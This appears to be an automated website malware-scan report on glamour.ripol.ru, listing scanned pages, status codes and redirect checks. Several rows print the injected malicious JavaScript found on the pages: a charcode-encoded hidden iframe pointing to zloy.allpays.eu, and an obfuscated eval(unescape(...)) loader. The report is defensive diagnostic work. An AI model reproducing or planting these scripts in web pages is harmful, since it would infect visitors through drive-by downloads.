Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=glamour.ripol.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://glamour.ripol.ru/ | 200 OK Content-Length: 44885 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,122,108,111,121,46,97,108,108,112,97,121,115,46,101,117,47,116,100,115,47,105,110,100,101,120,46,112,104,112,63,111,117,116,61,49,50,48,50,54,53,54,55,50,50,34,32,119,105,100,116,104,61,49,32,104,101,105,103,104,116,61,49,32,62,60,47,105,102,114,97,109,101,62)) Decoded script: <iframe src="http://zloy.allpays.eu/tds/index.php?out=1202656722" width=1 height=1 ></iframe> Antivirus reports:
| ||
http://glamour.ripol.ru/index.shtml | 200 OK Content-Length: 44885 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,122,108,111,121,46,97,108,108,112,97,121,115,46,101,117,47,116,100,115,47,105,110,100,101,120,46,112,104,112,63,111,117,116,61,49,50,48,50,54,53,54,55,50,50,34,32,119,105,100,116,104,61,49,32,104,101,105,103,104,116,61,49,32,62,60,47,105,102,114,97,109,101,62)) Decoded script: <iframe src="http://zloy.allpays.eu/tds/index.php?out=1202656722" width=1 height=1 ></iframe> Antivirus reports:
| ||
http://glamour.ripol.ru/zakaz.shtml | 200 OK Content-Length: 44802 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape('function%20hDNvk%28yEVhZeaG%29%7Bfunction%20uZtWxb%28rGiz%29%7Bvar%20psr%3D0%2CeGKf%2CcbrSQB%3DrGiz.length%3Bfor%28eGKf%3D0%3BeGKf%3CcbrSQB%3BeGKf++%29psr+%3DrGiz.charCodeAt%28eGKf%29*cbrSQB%3Breturn%20new%20String%28psr%29%7DyEVhZeaG%3Dunescape%28yEVhZeaG%29%3Bvar%20fGl%3Deval%28%27aCrfg@uLmzeCnftfsL.zcLaCl@lLeLeC%27.replace%28/%5Bfz@CL%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%2Cdfh%3DuZtWxb%28fGl%29%2CyqGz%3Dnew%20String%28%29%2Cxq Antivirus reports:
| ||
http://glamour.ripol.ru/texts.shtml | 200 OK Content-Length: 44688 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape('function%20hDNvk%28yEVhZeaG%29%7Bfunction%20uZtWxb%28rGiz%29%7Bvar%20psr%3D0%2CeGKf%2CcbrSQB%3DrGiz.length%3Bfor%28eGKf%3D0%3BeGKf%3CcbrSQB%3BeGKf++%29psr+%3DrGiz.charCodeAt%28eGKf%29*cbrSQB%3Breturn%20new%20String%28psr%29%7DyEVhZeaG%3Dunescape%28yEVhZeaG%29%3Bvar%20fGl%3Deval%28%27aCrfg@uLmzeCnftfsL.zcLaCl@lLeLeC%27.replace%28/%5Bfz@CL%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%2Cdfh%3DuZtWxb%28fGl%29%2CyqGz%3Dnew%20String%28%29%2Cxq Antivirus reports:
| ||
http://glamour.ripol.ru/foto.shtml | 200 OK Content-Length: 44745 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape('function%20hDNvk%28yEVhZeaG%29%7Bfunction%20uZtWxb%28rGiz%29%7Bvar%20psr%3D0%2CeGKf%2CcbrSQB%3DrGiz.length%3Bfor%28eGKf%3D0%3BeGKf%3CcbrSQB%3BeGKf++%29psr+%3DrGiz.charCodeAt%28eGKf%29*cbrSQB%3Breturn%20new%20String%28psr%29%7DyEVhZeaG%3Dunescape%28yEVhZeaG%29%3Bvar%20fGl%3Deval%28%27aCrfg@uLmzeCnftfsL.zcLaCl@lLeLeC%27.replace%28/%5Bfz@CL%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%2Cdfh%3DuZtWxb%28fGl%29%2CyqGz%3Dnew%20String%28%29%2Cxq Antivirus reports:
| ||
http://glamour.ripol.ru/contacts.shtml | 200 OK Content-Length: 8041 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape('function%20hDNvk%28yEVhZeaG%29%7Bfunction%20uZtWxb%28rGiz%29%7Bvar%20psr%3D0%2CeGKf%2CcbrSQB%3DrGiz.length%3Bfor%28eGKf%3D0%3BeGKf%3CcbrSQB%3BeGKf++%29psr+%3DrGiz.charCodeAt%28eGKf%29*cbrSQB%3Breturn%20new%20String%28psr%29%7DyEVhZeaG%3Dunescape%28yEVhZeaG%29%3Bvar%20fGl%3Deval%28%27a%5DrTgTu8m%24e%23n%24t%23sT.%23c%5Da%23lTl%5De8e%24%27.replace%28/%5BT%5C%5D%238%5C%24%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%2Cdfh%3DuZtWxb%28fGl%29% Antivirus reports:
| ||
http://glamour.ripol.ru/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://glamour.ripol.ru/2.shtml | 200 OK Content-Length: 43734 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape('function%20hDNvk%28yEVhZeaG%29%7Bfunction%20uZtWxb%28rGiz%29%7Bvar%20psr%3D0%2CeGKf%2CcbrSQB%3DrGiz.length%3Bfor%28eGKf%3D0%3BeGKf%3CcbrSQB%3BeGKf++%29psr+%3DrGiz.charCodeAt%28eGKf%29*cbrSQB%3Breturn%20new%20String%28psr%29%7DyEVhZeaG%3Dunescape%28yEVhZeaG%29%3Bvar%20fGl%3Deval%28%27aCrfg@uLmzeCnftfsL.zcLaCl@lLeLeC%27.replace%28/%5Bfz@CL%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%2Cdfh%3DuZtWxb%28fGl%29%2CyqGz%3Dnew%20String%28%29%2Cxq Antivirus reports:
| ||
http://glamour.ripol.ru/3.shtml | 200 OK Content-Length: 43754 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape('function%20hDNvk%28yEVhZeaG%29%7Bfunction%20uZtWxb%28rGiz%29%7Bvar%20psr%3D0%2CeGKf%2CcbrSQB%3DrGiz.length%3Bfor%28eGKf%3D0%3BeGKf%3CcbrSQB%3BeGKf++%29psr+%3DrGiz.charCodeAt%28eGKf%29*cbrSQB%3Breturn%20new%20String%28psr%29%7DyEVhZeaG%3Dunescape%28yEVhZeaG%29%3Bvar%20fGl%3Deval%28%27aCrfg@uLmzeCnftfsL.zcLaCl@lLeLeC%27.replace%28/%5Bfz@CL%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%2Cdfh%3DuZtWxb%28fGl%29%2CyqGz%3Dnew%20String%28%29%2Cxq Antivirus reports:
| ||
http://glamour.ripol.ru/4.shtml | 200 OK Content-Length: 43729 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape('function%20hDNvk%28yEVhZeaG%29%7Bfunction%20uZtWxb%28rGiz%29%7Bvar%20psr%3D0%2CeGKf%2CcbrSQB%3DrGiz.length%3Bfor%28eGKf%3D0%3BeGKf%3CcbrSQB%3BeGKf++%29psr+%3DrGiz.charCodeAt%28eGKf%29*cbrSQB%3Breturn%20new%20String%28psr%29%7DyEVhZeaG%3Dunescape%28yEVhZeaG%29%3Bvar%20fGl%3Deval%28%27aCrfg@uLmzeCnftfsL.zcLaCl@lLeLeC%27.replace%28/%5Bfz@CL%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%2Cdfh%3DuZtWxb%28fGl%29%2CyqGz%3Dnew%20String%28%29%2Cxq Antivirus reports:
| ||
http://glamour.ripol.ru/5.shtml | 200 OK Content-Length: 43835 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape('function%20hDNvk%28yEVhZeaG%29%7Bfunction%20uZtWxb%28rGiz%29%7Bvar%20psr%3D0%2CeGKf%2CcbrSQB%3DrGiz.length%3Bfor%28eGKf%3D0%3BeGKf%3CcbrSQB%3BeGKf++%29psr+%3DrGiz.charCodeAt%28eGKf%29*cbrSQB%3Breturn%20new%20String%28psr%29%7DyEVhZeaG%3Dunescape%28yEVhZeaG%29%3Bvar%20fGl%3Deval%28%27aCrfg@uLmzeCnftfsL.zcLaCl@lLeLeC%27.replace%28/%5Bfz@CL%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%2Cdfh%3DuZtWxb%28fGl%29%2CyqGz%3Dnew%20String%28%29%2Cxq Antivirus reports:
| ||
http://glamour.ripol.ru/6.shtml | 200 OK Content-Length: 43729 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape('function%20hDNvk%28yEVhZeaG%29%7Bfunction%20uZtWxb%28rGiz%29%7Bvar%20psr%3D0%2CeGKf%2CcbrSQB%3DrGiz.length%3Bfor%28eGKf%3D0%3BeGKf%3CcbrSQB%3BeGKf++%29psr+%3DrGiz.charCodeAt%28eGKf%29*cbrSQB%3Breturn%20new%20String%28psr%29%7DyEVhZeaG%3Dunescape%28yEVhZeaG%29%3Bvar%20fGl%3Deval%28%27aCrfg@uLmzeCnftfsL.zcLaCl@lLeLeC%27.replace%28/%5Bfz@CL%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%2Cdfh%3DuZtWxb%28fGl%29%2CyqGz%3Dnew%20String%28%29%2Cxq Antivirus reports:
| ||
http://glamour.ripol.ru/7.shtml | 200 OK Content-Length: 43798 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape('function%20hDNvk%28yEVhZeaG%29%7Bfunction%20uZtWxb%28rGiz%29%7Bvar%20psr%3D0%2CeGKf%2CcbrSQB%3DrGiz.length%3Bfor%28eGKf%3D0%3BeGKf%3CcbrSQB%3BeGKf++%29psr+%3DrGiz.charCodeAt%28eGKf%29*cbrSQB%3Breturn%20new%20String%28psr%29%7DyEVhZeaG%3Dunescape%28yEVhZeaG%29%3Bvar%20fGl%3Deval%28%27aCrfg@uLmzeCnftfsL.zcLaCl@lLeLeC%27.replace%28/%5Bfz@CL%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%2Cdfh%3DuZtWxb%28fGl%29%2CyqGz%3Dnew%20String%28%29%2Cxq Antivirus reports:
| ||
http://glamour.ripol.ru/8.shtml | 200 OK Content-Length: 43739 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape('function%20hDNvk%28yEVhZeaG%29%7Bfunction%20uZtWxb%28rGiz%29%7Bvar%20psr%3D0%2CeGKf%2CcbrSQB%3DrGiz.length%3Bfor%28eGKf%3D0%3BeGKf%3CcbrSQB%3BeGKf++%29psr+%3DrGiz.charCodeAt%28eGKf%29*cbrSQB%3Breturn%20new%20String%28psr%29%7DyEVhZeaG%3Dunescape%28yEVhZeaG%29%3Bvar%20fGl%3Deval%28%27aCrfg@uLmzeCnftfsL.zcLaCl@lLeLeC%27.replace%28/%5Bfz@CL%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%2Cdfh%3DuZtWxb%28fGl%29%2CyqGz%3Dnew%20String%28%29%2Cxq Antivirus reports:
| ||
http://glamour.ripol.ru/9.shtml | 200 OK Content-Length: 43810 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape('function%20hDNvk%28yEVhZeaG%29%7Bfunction%20uZtWxb%28rGiz%29%7Bvar%20psr%3D0%2CeGKf%2CcbrSQB%3DrGiz.length%3Bfor%28eGKf%3D0%3BeGKf%3CcbrSQB%3BeGKf++%29psr+%3DrGiz.charCodeAt%28eGKf%29*cbrSQB%3Breturn%20new%20String%28psr%29%7DyEVhZeaG%3Dunescape%28yEVhZeaG%29%3Bvar%20fGl%3Deval%28%27aCrfg@uLmzeCnftfsL.zcLaCl@lLeLeC%27.replace%28/%5Bfz@CL%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%2Cdfh%3DuZtWxb%28fGl%29%2CyqGz%3Dnew%20String%28%29%2Cxq Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: glamour.ripol.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Dec 2014 19:23:27 GMT
Accept-Ranges: bytes
Server: nginx/1.4.1
Content-Language: ru
Content-Type: text/html; charset=windows-1251
GET / HTTP/1.1
Host: glamour.ripol.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Dec 2014 19:23:27 GMT
Accept-Ranges: bytes
Server: nginx/1.4.1
Content-Language: ru
Content-Type: text/html; charset=windows-1251
Second query (visit from search engine):
GET / HTTP/1.1
Host: glamour.ripol.ru
Referer: http://www.google.com/search?q=glamour.ripol.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: glamour.ripol.ru
Referer: http://www.google.com/search?q=glamour.ripol.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.